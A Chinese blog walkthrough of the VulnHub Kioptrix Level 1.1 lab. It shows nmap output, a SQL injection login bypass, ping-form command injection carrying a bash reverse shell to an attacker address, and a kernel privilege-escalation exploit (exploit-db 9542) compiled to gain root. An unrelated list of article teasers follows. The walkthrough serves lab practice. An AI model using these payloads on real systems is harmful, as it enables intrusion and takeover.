冬萍子
冬萍子

vulnhub- Kioptrix: Level 1.1 (#2) (考点:sql注入/命令执行/linux版本提权)

arp-scan -l
扫出来多的那个就是

nmap

map scan report for 192.168.189.164
Host is up (0.00054s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
|_ssl-date: 2020-04-19T08:22:47+00:00; -3h09m39s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      MySQL (unauthorized)

先进80看看

直接登录框
vulnhub- Kioptrix: Level 1.1 (#2) (考点:sql注入/命令执行/linux版本提权)_第1张图片
当然要先试试sql注入了admin' or '1'='1,密码随便

进去后是这个ping
如果你ping的后面加上 & 后面才插命令,它也会执行,这里就可以加弹shell命令。这个在hackthebox里也有类似的靶机,参考crono
后面换上自己的地址

10.10.14.3 & bash -i >& /dev/tcp/192.xxx.xxx.xxx/4444 0>&1

本机打开监听,收到

先用这个把shell变成tty方便一些

python -c 'import pty; pty.spawn("/bin/bash")'

然后准备我做所有linux机的老套路linpeas.sh。但是执行不了。。奇怪。。home的文件夹也进不了
我觉得自己想复杂了。先看下uname -a
版本信息2.6.9很老、、直接提权就行了

用这个提权工具

./linux-exploit-suggester.sh -k 2.6.9

搜出很多建议
在里面打开网页找哪个是提权相关的

比如这个

[+] [CVE-2009-2698] ip_append_data

   Details: https://www.exploit-db.com/exploits/9542/
   Exposure: less probable
   Tags: fedora=4|5|6,RHEL=4
   Download URL: https://www.exploit-db.com/download/9542

打开相应网站,也写了Privilege Escalation提权,版本也对得上
vulnhub- Kioptrix: Level 1.1 (#2) (考点:sql注入/命令执行/linux版本提权)_第2张图片

就这个。下载下来。python -m SimpleHTTPServer 80开启本机的80,wget到/tmp,毕竟tmp,权限很松,都有写,修改文件的权限
gcc 9542.c -o 9542

执行,成功root
vulnhub- Kioptrix: Level 1.1 (#2) (考点:sql注入/命令执行/linux版本提权)_第3张图片

你可能感兴趣的:(vulnhub- Kioptrix: Level 1.1 (#2) (考点:sql注入/命令执行/linux版本提权))

  • ES from size聚合查询10000聚合查询,是每个分片先聚合,再统计。还是所有节点查询1万条后,再聚合 C18298182575 elasticsearchelasticsearch大数据搜索引擎
    在Elasticsearch中,聚合查询的执行过程是分布式的,Elasticsearch会先在每个分片(shard)上执行本地聚合,然后再在协调节点(coordinatingnode)上对所有分片的聚合结果进行全局汇总。具体过程如下:1.聚合查询的执行过程1.1分片级别的本地聚合查询分发:当你在Elasticsearch中执行一个聚合查询时,协调节点会将查询分发到索引的每个分片(shard)上。本
  • React - 兄弟互传 - 消息订阅 - 发布机制 来一碗刘肉面 Reactreact.js前端javascript
    pubsub-js是一个轻量级的JavaScript库,用于实现发布-订阅(Pub/Sub)模式。该模式使得组件间的通信变得简单和高效,特别适用于React中的兄弟组件之间通信。通过pubsub-js,一个组件可以发布消息,其他组件可以订阅这些消息以获得更新。1.安装pubsub-jsnpminstallpubsub-js//或者yarnaddpubsub-js2.基本概念发布(Publish):
  • 最大公约数和最小公倍数 王嘉俊925 算法算法c++C++
    最大公约数和最小公倍数最大公约数两个数a和b的最大公约数是指它们所有公约数中最大的那个,通常记作gcd(a,b)。定义公约数:能同时整除a和b的正整数。最大公约数:所有公约数集合中的最大值。例如:gcd(12,18)=6,因为6是12和18的最大公约数。求解方法1.欧几里得算法(辗转相除法)原理:对于正整数a和b,有gcd(a,b)=gcd(b,a%b),其中%表示取模运算(求余数)。该方法通过不
  • HTML学习笔记 誓死守护发际线 html学习笔记
    文章目录(一)HTML简介一、网页1.什么是网页2.什么是HTML二、常用的浏览器1.常用的浏览器2.浏览器内核(渲染引擎)3.web标准(二)HTML标签一、HTML语法规范1.基本语法概述2.标签的关系二、HTML基本结构标签三、网页开发工具1.VSCode的使用:2.vsCode工具生成骨架标签新增代码1)标签2)lang语言3)charset字符集四、HTML常用标签1.语义化标签:2.标
  • 【设计模式】状态机详解与Spring State Machine实践 小徐Chao努力 设计模式设计模式springjava后端架构
    状态机详解与SpringStateMachine实践目录状态机基础1.1什么是状态机1.2状态机的基本概念1.3状态机类型SpringStateMachine概述2.1核心组件2.2工作原理SpringStateMachine实战-订单状态流转3.1环境配置3.2状态与事件定义3.3状态机配置3.4状态机持久化3.5状态监听器实现3.6状态事件工具类3.7业务服务实现3.8接口控制器3.9运行效果
  • XSL样式表1 xuefeimengli2010 xsl文档xml脚本语言xslt
    第9章XSL样式表9。1什么是xsl9。2导入XSL样式表9。3不同的XML样式表9。4XSL的基本元素9。5如何选择节点9。6匹配节点的典型情况9。7常用的XSL函数介绍·XSL中文翻译为“可扩展的样式语言”·包括XSLT变换语言和XSL-FO格式化语言两分·XSLT·规定如何将XML文档变换成另一个XML文档。·变换后的XML文档可使用原文档的标记和DTD。·大多数情况下,它会使用一组不同的标
  • 【并发编程】一文帮你搞懂并发编程常见概念-计算机架构去理解 小徐Chao努力 源码分析并发编程架构javaspring
    原子操作与并发控制详解目录1.原子操作基础1.1原子操作定义1.2原子操作的重要性1.3原子操作的应用场景2.处理器实现原子操作2.1使用总线锁保证原子性2.1.1总线锁的定义2.1.2总线锁的工作原理2.1.3总线锁的优缺点2.2使用缓存锁保证原子性2.2.1缓存锁的原理2.2.2缓存锁的实现方式2.2.3缓存锁的优点和限制2.2.4缓存锁与总线锁的对比3.缓存行与内存架构3.1缓存行的定义3.
  • 优艾智合完成B系列超3亿元人民币融资 加速移动机器人规模化落地 weixin_51795422 科技财经人工智能
    12月28日,工业移动机器人头部企业优艾智合宣布近期完成B系列融资,金额累计超3亿元人民币。两轮分别由方广资本、熙诚金睿领投,IDG、松禾、SIG、蓝驰、软银、HAX等新老股东跟投,均由泰合资本担任独家财务顾问。早期投资机构包括真格、常见、英诺、招商局伯乐、西交1896。作为国内领先的移动机器人及解决方案提供商,优艾智合基于工业物流及智能巡检运维两大业务,深耕于精密电子制造与能源行业中的生产运营场
  • DeepMind首席科学家最新万字访谈:模型「慢思考」,能力大幅提升! datawhale
    DatawhaleDatawhale分享访谈:JackRae,编译:数字开物2月25日,谷歌DeepMind首席科学家JackRae接受访谈,就谷歌思维模型的发展进行深入讨论。JackRae指出,推理模型是AI发展的新范式,推理模型并非追求即时响应,而是通过增加推理时的思考时间来提升答案质量,这导致了一种新的ScalingLaw,“慢思考”模式是提升AI性能的有效途径。JackRae认为长语境对于
  • VS code 之 c++远程开发环境搭建 汝何秀 linuxvscode
    文章目录VScode之c/c++远程开发环境搭建1.基本环境2.远程主机的开发环境搭建3.本地vscode的配置配置ssh选项4远程开发教程VScode之c/c++远程开发环境搭建1.基本环境本地主机:VisualStudioCode远程主机:CentOS72.远程主机的开发环境搭建安装环境的压缩包:dev_env_install.tar.gz解压文件夹:repo自动安装脚本为:dev_env.s
  • Office 2013、2016、2019三版本区别 小魚資源大雜燴 windows
    界面设计Office2013:采用全新的简约化界面,扁平化的设计风格,这种风格在后续的2016版、2019版中也一直被沿用。Office2016:界面与2013版相似,但在细节上可能有一些优化和调整,整体更加成熟和稳定,对于常用功能的布局和展示也更加合理。Office2019:在用户界面和用户体验方面进行了一些改进,软件更加直观和易用,图标设计、菜单布局等方面更加现代化。功能改进Office201
  • mysql通过视图插入数据_数据库视图 sql weixin_39550410 mysql通过视图插入数据
    数据库必知词汇:数据库视图视图是从一个或几个基本表(或视图)中导出的虚拟的表。在系统的数据字典中仅存放了视图的定义,不存放视图对应的数据。视图与表(有时为与视图区别,也称表为基本表——BaseTable)不同,视图所对应的数据不进行实际存储,数据库中只存储视图的定义,在对视图的数据进行操作时,系统根据视图的定义去操作与视...文章萌萌怪兽2020-02-23113浏览量数据库优化之创建视图视图是保
  • mysql 用户添加查询视图权限_把视图查询权限授予普通用户 weixin_39560002 mysql用户添加查询视图权限
    对于一些oracle的普通用户需要查询某个视图,但是因为安全考虑不能把dba权限赋予普通用户,那只能把相关视图的查询权限赋予给普通用户,下面就来说一下怎么给普通用户授予视图的查询权限。1.给用户授予某个视图的查询权限SQL>grantselectonv$mystattotest1;grantselectonv$mystattotest1*ERRORatline1:ORA-02030:canonly
  • mysql8.0.12安装_mysql 8.0.12 安装配置图文教程 梦醒马亡
    记录了mysql8.0.12下载安装教程,分享给大家。下载如图下载以后将安装包解压到任意文件夹,我这里解压到E盘。安装1、解压以后有E:\mysql\mysql-8.0.12-winx64,里面建立一个空文件夹data,如果已经有这个文件夹就不用进行这一步2、建立一个my.ini文件,用记事本打开,复制以下代码进去[mysqld]#设置3306端口port=3306#设置mysql的安装目录bas
  • springboot中配置logback-spring.xml web13688565871 面试学习路线阿里巴巴springspringbootlogback
    一、在src/main/resources目录下,也就是在classpath路径下创建logback-spring.xml注:springboot框架自动配置,如果更换名称,可在配置文件指定该文件即可-->%d{yyyy-MM-ddHH:mm:ss}[%thread]%-5level%logger{80}-%msg%n${log_dir}/info.logINFOACCEPTDENY${log_d
  • Sophos Firewall (SFOS) v21 MR1 - 下一代防火墙 防火墙
    SophosFirewall(SFOS)v21MR1-下一代防火墙SophosFirewall|Next-genfirewall请访问原文链接:https://sysin.org/blog/sfos-21/查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgSophosFirewall远不止是防火墙通过我们的集成和可扩展平台巩固您的网络保护,来保护您的混合网络世界。您能得到的:自动响
  • Grok 3 vs. DeepSeek vs. ChatGPT:2025终极AI对决 一点一木 人工智能人工智能chatgpt前端
    2025年,AI领域的竞争愈发激烈,三个重量级选手争夺霸主地位:Grok3(由xAI开发)、DeepSeek(国内AI初创公司)和ChatGPT(OpenAI产品)。每个模型都有自己独特的优势,无论是在深度思考、速度、编程辅助、创意输出,还是在成本控制方面,都展现出强大的实力。但究竟谁能脱颖而出?没有一个万能的答案。最终的选择取决于你的AI需求和应用场景。在这场史诗级对决中,我将深入探讨这些模型的
  • 2025前端最新面试题-网络篇 大麦大麦 前端网络面试网络安全网络协议
    1.现代浏览器为何要禁用第三方cookie为了用户的安全(安全和隐私是浏览器永恒的话题)第三方cookie会记录用户的行为和数据,方便做广告有些浏览器默认禁止,Chrome增加了SameSite(谷歌有广告)cookie可以实现不同域共享吗同一主域名下的子域名,cookie可以共享2.实现心跳检验-用于断线重连functionHeartbeaet(){lettimer=0functionfn(){
  • 大模型在白血病诊疗全流程风险预测与方案制定中的应用研究 LCG元 围术期危险因子预测模型研究人工智能
    目录一、绪论1.1研究背景与意义1.2国内外研究现状1.3研究目的与内容二、大模型技术与白血病相关知识2.1大模型技术原理与特点2.2白血病的病理生理与诊疗现状三、术前风险预测与手术方案制定3.1术前数据收集与预处理3.2大模型预测术前风险3.3根据预测制定手术方案四、术中风险预测与麻醉方案优化4.1术中实时数据监测与采集4.2大模型动态风险预测4.3基于预测调整麻醉方案五、术后风险预测与护理方案
  • 大模型在心力衰竭预测及临床方案制定中的应用研究报告 LCG元 围术期危险因子预测模型研究人工智能
    目录一、引言1.1研究背景与意义1.2研究目的1.3研究方法与创新点二、大模型技术与心力衰竭概述2.1大模型技术原理与发展2.2心力衰竭的病理机制与现状三、大模型在心力衰竭术前风险预测中的应用3.1数据收集与预处理3.2预测模型的构建与训练3.3模型评估与验证3.4基于预测结果的手术方案制定四、大模型在心力衰竭术中风险预测中的应用4.1术中数据监测与获取4.2风险预测模型的实时更新与应用4.3针对
  • 第十三届蓝桥杯大赛软件赛决赛C/C++ 大学 B 组 Kent_J_Truman 蓝桥杯蓝桥杯
    A【2022——暴力DP/优雅背包】-CSDN博客B【钟表——类日期问题】-CSDN博客C【卡牌——二分】-CSDN博客D【最大数字——DFS】-CSDN博客E【出差——Dijkstra】-CSDN博客F【费用报销——01背包】-CSDN博客G【故障——条件概率】-CSDN博客H【机房——LCA】-CSDN博客I【齿轮——优化(预处理,去重,哈希)】-CSDN博客J【搬砖——经典带贪心01背包(背
  • Flutter鸿蒙项目—如何添加对华为鸿蒙系统的支持 不入流HarmonyOS开发 鸿蒙HarmonyOSOpenHarmonyflutterharmonyos华为OpenHarmony鸿蒙应用开发鸿蒙开发鸿蒙
    1.DevEcoStudio4.0Release版鸿蒙环境安装打开IDE,按照引导,安装环境即可,注意,nodejs选择v16.20。Mac下,在.bash_profile配置如下环境变量exportPATH=/Users/用户名/Documents/DevEcoProjects/dev/bin:$PATHexportNODE_HOME=/Users/用户名/nodejsexportPATH=$N
  • RabbitMQ复习 SJLoveIT rabbitmq分布式
    消息中间件的作用:(1)异步处理(2)应用解耦(3)流量削峰消息中间件的缺点:引入了新的东西,也就增加了新的故障点。比如消息中间件挂了,影响系统的可用性。两种框架:JMS和AMQP最大的区别是JMS是是javaapi,对跨平台的支持较差,但在纯java技术栈内首选。AMQP是跨平台的,序列化方式选json,不管你是java,php,C/C++,python,都能处理RabbitMQ实现的事AMQP
  • 数据库不停机迁移方案 SJLoveIT 数据库
    在业务发展过程中,可能会有需要进行数据迁移的场景。一般来说可以分为两种(1)停机迁移(2)不停机迁移停机迁移比较简单,步骤如下(1)根据业务流量数据低峰时间,制定迁移计划。(2)发布停业公告(3)届时先停机,保证老库数据不会再变动,然后使用迁移工具进行数据的全量迁移(4)迁移完成后进行新老数据库数据的对比校验(5)数据校验没问题,流程切换到新库,完成停机迁移的问题在于(1)有的业务压根就不能容忍停
  • 学习笔记:java的23种设计模式总结 SJLoveIT java设计模式
    设计原则开闭原则:对扩展开放,对修改关闭里氏替换原则:尽量不重写父类的非抽象方法迪米特法则:不要和陌生人说话依赖倒置原则:面向接口、面向抽象编程。spring容器和Bean的自动注入就是最生动的实践单一职责原则:一个人只做一件事,别乱套了接口隔离原则:和单一职责类似合成复用原则:尽量先通过组合等来实现,而非通过继承来实现优先考虑hasA而非isA设计模式(1)单例模式饿汉式懒汉式DCL双重检测锁v
  • k8s部署Nginx实现外部访问 leetrocken nginxdockerk8syaml
    k8s部署Nginx实现外部访问1.准备k8s环境[root@masteryaml]#kubectlgetnodes##两个节点均为Ready状态NAMESTATUSROLESAGEVERSIONmasterReadymaster3d8hv1.18.1nodeReady3d8hv1.18.12.检查主机上是否存在Nginx镜像[root@mastercicd]#dockerimages|grepn
  • Tomcat 8.0.12 资源下载 洪岭瑶
    Tomcat8.0.12资源下载【下载地址】Tomcat8.0.12资源下载本仓库提供Tomcat8.0.12版本的资源文件下载。Tomcat是一个开源的JavaServlet容器,广泛用于部署和运行JavaWeb应用程序项目地址:https://gitcode.com/open-source-toolkit/dde6e简介本仓库提供Tomcat8.0.12版本的资源文件下载。Tomcat是一个开
  • 分析http请求数据常见异常 good_good_xiu 项目备忘录BufferReaderhttp请求异常
    1.ConnectException连接超时访问该地址超时,无法连接该服务器。这种情况直接抓取该异常提醒即可。2.SocketTimeoutException读取数据超时注:可以用过URL类.getxxx方法获取url的主机名端口号等等(newURL(url))能连接服务器,但是与服务器交互时间超过请求最大连接时长。这种情况需要对目标主机进行ping操作确定网络速度。(kB/s)pingip-l1
  • Grok-3和DeepSeek-R1,谁更胜一筹? xiaocang668888 人工智能DeepSeek
    关于Grok-3(xAI研发)与DeepSeek-R1(深度求索公司产品)的技术竞合,需从核心定位、场景穿透力和战略生态三重维度展开深度解构。两大模型代表两种技术演化路径的终极对决,其胜负取决于问题域的边界定义。一、基础能力的对称平衡能力维度Grok-3DeepSeek-R1参数量级混合专家模型(MoE)架构,总参量4.2T,活跃参数860B稠密神经架构,320B全激活参数知识保鲜动态知识注入(每
  • 完整的 Python 数据分析案例:在线游戏玩家付费预测 萧十一郎@ python机器学习人工智能
    目录1.案例背景代码实现2.主要的代码难点解析2.1数据清洗-缺失值处理2.2特征工程-新特征计算与独热编码2.3特征选择2.4模型训练与评估2.5数据可视化3.可能改进的代码3.1数据清洗与特征工程改进3.2模型改进3.3可视化改进1.案例背景在在线游戏行业中,准确预测玩家是否会付费以及付费金额,对于游戏运营商制定营销策略、优化游戏设计和提高盈利能力至关重要。本案例将基于玩家的游戏行为数据(如游
  • scala的option和some 矮蛋蛋 编程scala
    原文地址: http://blog.sina.com.cn/s/blog_68af3f090100qkt8.html 对于学习 Scala 的 Java™ 开发人员来说,对象是一个比较自然、简单的入口点。在 本系列 前几期文章中,我介绍了 Scala 中一些面向对象的编程方法,这些方法实际上与 Java 编程的区别不是很大。我还向您展示了 Scala 如何重新应用传统的面向对象概念,找到其缺点
  • NullPointerException Cb123456 androidBaseAdapter
        java.lang.NullPointerException: Attempt to invoke virtual method 'int android.view.View.getImportantForAccessibility()' on a null object reference     出现以上异常.然后就在baidu上
  • PHP使用文件和目录 天子之骄 php文件和目录读取和写入php验证文件php锁定文件
    PHP使用文件和目录 1.使用include()包含文件 (1):使用include()从一个被包含文档返回一个值 (2):在控制结构中使用include()   include_once()函数需要一个包含文件的路径,此外,第一次调用它的情况和include()一样,如果在脚本执行中再次对同一个文件调用,那么这个文件不会再次包含。   在php.ini文件中设置
  • SQL SELECT DISTINCT 语句 何必如此 sql
    SELECT DISTINCT 语句用于返回唯一不同的值。 SQL SELECT DISTINCT 语句 在表中,一个列可能会包含多个重复值,有时您也许希望仅仅列出不同(distinct)的值。 DISTINCT 关键词用于返回唯一不同的值。 SQL SELECT DISTINCT 语法 SELECT DISTINCT column_name,column_name F
  • java冒泡排序 3213213333332132 java冒泡排序
    package com.algorithm; /** * @Description 冒泡 * @author FuJianyong * 2015-1-22上午09:58:39 */ public class MaoPao { public static void main(String[] args) { int[] mao = {17,50,26,18,9,10
  • struts2.18 +json,struts2-json-plugin-2.1.8.1.jar配置及问题! 7454103 DAOspringAjaxjsonqq
    struts2.18  出来有段时间了! (貌似是 稳定版)   闲时研究下下!  貌似 sruts2 搭配 json 做 ajax 很吃香!   实践了下下! 不当之处请绕过! 呵呵   网上一大堆 struts2+json  不过大多的json 插件 都是 jsonplugin.34.jar   strut
  • struts2 数据标签说明 darkranger jspbeanstrutsservletScheme
    数据标签主要用于提供各种数据访问相关的功能,包括显示一个Action里的属性,以及生成国际化输出等功能 数据标签主要包括: action :该标签用于在JSP页面中直接调用一个Action,通过指定executeResult参数,还可将该Action的处理结果包含到本页面来。 bean :该标签用于创建一个javabean实例。如果指定了id属性,则可以将创建的javabean实例放入Sta
  • 链表.简单的链表节点构建 aijuans 编程技巧
    /*编程环境WIN-TC*/ #include "stdio.h" #include "conio.h" #define NODE(name, key_word, help) \  Node name[1]={{NULL, NULL, NULL, key_word, help}} typedef struct node {  &nbs
  • tomcat下jndi的三种配置方式 avords tomcat
    jndi(Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的API。命名服务将名称和对象联系起来,使得我们可以用名称 访问对象。目录服务是一种命名服务,在这种服务里,对象不但有名称,还有属性。          tomcat配置
  • 关于敏捷的一些想法 houxinyou 敏捷
    从网上看到这样一句话:“敏捷开发的最重要目标就是:满足用户多变的需求,说白了就是最大程度的让客户满意。” 感觉表达的不太清楚。 感觉容易被人误解的地方主要在“用户多变的需求”上。 第一种多变,实际上就是没有从根本上了解了用户的需求。用户的需求实际是稳定的,只是比较多,也比较混乱,用户一般只能了解自己的那一小部分,所以没有用户能清楚的表达出整体需求。而由于各种条件的,用户表达自己那一部分时也有
  • 富养还是穷养,决定孩子的一生 bijian1013 教育人生
    是什么决定孩子未来物质能否丰盛?为什么说寒门很难出贵子,三代才能出贵族?真的是父母必须有钱,才能大概率保证孩子未来富有吗?-----作者:@李雪爱与自由 事实并非由物质决定,而是由心灵决定。一朋友富有而且修养气质很好,兄弟姐妹也都如此。她的童年时代,物质上大家都很贫乏,但妈妈总是保持生活中的美感,时不时给孩子们带回一些美好小玩意,从来不对孩子传递生活艰辛、金钱来之不易、要懂得珍惜
  • oracle 日期时间格式转化 征客丶 oracle
    oracle 系统时间有 SYSDATE 与 SYSTIMESTAMP; SYSDATE:不支持毫秒,取的是系统时间; SYSTIMESTAMP:支持毫秒,日期,时间是给时区转换的,秒和毫秒是取的系统的。 日期转字符窜: 一、不取毫秒: TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS') 简要说明, YYYY 年 MM   月
  • 【Scala六】分析Spark源代码总结的Scala语法四 bit1129 scala
    1. apply语法   FileShuffleBlockManager中定义的类ShuffleFileGroup,定义:   private class ShuffleFileGroup(val shuffleId: Int, val fileId: Int, val files: Array[File]) { ... def apply(bucketId
  • Erlang中有意思的bug bookjovi erlang
      代码中常有一些很搞笑的bug,如下面的一行代码被调用两次(Erlang beam) commit f667e4a47b07b07ed035073b94d699ff5fe0ba9b Author: Jovi Zhang <[email protected]> Date: Fri Dec 2 16:19:22 2011 +0100 erts:
  • 移位打印10进制数转16进制-2008-08-18 ljy325 java基础
    /** * Description 移位打印10进制的16进制形式 * Creation Date 15-08-2008 9:00 * @author 卢俊宇 * @version 1.0 * */ public class PrintHex { // 备选字符 static final char di
  • 读《研磨设计模式》-代码笔记-组合模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; abstract class Component { public abstract void printStruct(Str
  • 利用cmd命令将.class文件打包成jar chenyu19891124 cmdjar
    cmd命令打jar是如下实现: 在运行里输入cmd,利用cmd命令进入到本地的工作盘符。(如我的是D盘下的文件有此路径 D:\workspace\prpall\WEB-INF\classes) 现在是想把D:\workspace\prpall\WEB-INF\classes路径下所有的文件打包成prpall.jar。然后继续如下操作: cd D: 回车 cd workspace/prpal
  • [原创]JWFD v0.96 工作流系统二次开发包 for Eclipse 简要说明 comsci eclipse设计模式算法工作swing
                           JWFD v0.96 工作流系统二次开发包 for Eclipse 简要说明     &nb
  • SecureCRT右键粘贴的设置 daizj secureCRT右键粘贴
    一般都习惯鼠标右键自动粘贴的功能,对于SecureCRT6.7.5 ,这个功能也已经是默认配置了。 老版本的SecureCRT其实也有这个功能,只是不是默认设置,很多人不知道罢了。 菜单: Options->Global Options ...->Terminal 右边有个Mouse的选项块。 Copy on Select Paste on Right/Middle
  • Linux 软链接和硬链接 dongwei_6688 linux
    1.Linux链接概念Linux链接分两种,一种被称为硬链接(Hard Link),另一种被称为符号链接(Symbolic Link)。默认情况下,ln命令产生硬链接。 【硬连接】硬连接指通过索引节点来进行连接。在Linux的文件系统中,保存在磁盘分区中的文件不管是什么类型都给它分配一个编号,称为索引节点号(Inode Index)。在Linux中,多个文件名指向同一索引节点是存在的。一般这种连
  • DIV底部自适应 dcj3sjt126com JavaScript
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&q
  • Centos6.5使用yum安装mysql——快速上手必备 dcj3sjt126com mysql
    第1步、yum安装mysql [root@stonex ~]#  yum -y install mysql-server 安装结果: Installed:     mysql-server.x86_64 0:5.1.73-3.el6_5                   &nb
  • 如何调试JDK源码 frank1234 jdk
    相信各位小伙伴们跟我一样,想通过JDK源码来学习Java,比如collections包,java.util.concurrent包。 可惜的是sun提供的jdk并不能查看运行中的局部变量,需要重新编译一下rt.jar。 下面是编译jdk的具体步骤:         1.把C:\java\jdk1.6.0_26\sr
  • Maximal Rectangle hcx2013 max
    Given a 2D binary matrix filled with 0's and 1's, find the largest rectangle containing all ones and return its area.   public class Solution { public int maximalRectangle(char[][] matrix)
  • Spring MVC测试框架详解——服务端测试 jinnianshilongnian spring mvc test
    随着RESTful Web Service的流行,测试对外的Service是否满足期望也变的必要的。从Spring 3.2开始Spring了Spring Web测试框架,如果版本低于3.2,请使用spring-test-mvc项目(合并到spring3.2中了)。   Spring MVC测试框架提供了对服务器端和客户端(基于RestTemplate的客户端)提供了支持。 &nbs
  • Linux64位操作系统(CentOS6.6)上如何编译hadoop2.4.0 liyong0802 hadoop
    一、准备编译软件   1.在官网下载jdk1.7、maven3.2.1、ant1.9.4,解压设置好环境变量就可以用。     环境变量设置如下:   (1)执行vim /etc/profile (2)在文件尾部加入: export JAVA_HOME=/home/spark/jdk1.7 export MAVEN_HOME=/ho
  • StatusBar 字体白色 pangyulei status
    [[UIApplication sharedApplication] setStatusBarStyle:UIStatusBarStyleLightContent]; /*you'll also need to set UIViewControllerBasedStatusBarAppearance to NO in the plist file if you use this method
  • 如何分析Java虚拟机死锁 sesame javathreadoracle虚拟机jdbc
    英文资料: Thread Dump and Concurrency Locks   Thread dumps are very useful for diagnosing synchronization related problems such as deadlocks on object monitors. Ctrl-\ on Solaris/Linux or Ctrl-B
  • 位运算简介及实用技巧(一):基础篇 tw_wangzhengquan 位运算
    http://www.matrix67.com/blog/archives/263    去年年底写的关于位运算的日志是这个Blog里少数大受欢迎的文章之一,很多人都希望我能不断完善那篇文章。后来我看到了不少其它的资料,学习到了更多关于位运算的知识,有了重新整理位运算技巧的想法。从今天起我就开始写这一系列位运算讲解文章,与其说是原来那篇文章的follow-up,不如说是一个r
  • jsearch的索引文件结构 yangshangchuan 搜索引擎jsearch全文检索信息检索word分词
    jsearch是一个高性能的全文检索工具包,基于倒排索引,基于java8,类似于lucene,但更轻量级。   jsearch的索引文件结构定义如下:     1、一个词的索引由=分割的三部分组成:        第一部分是词        第二部分是这个词在多少
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他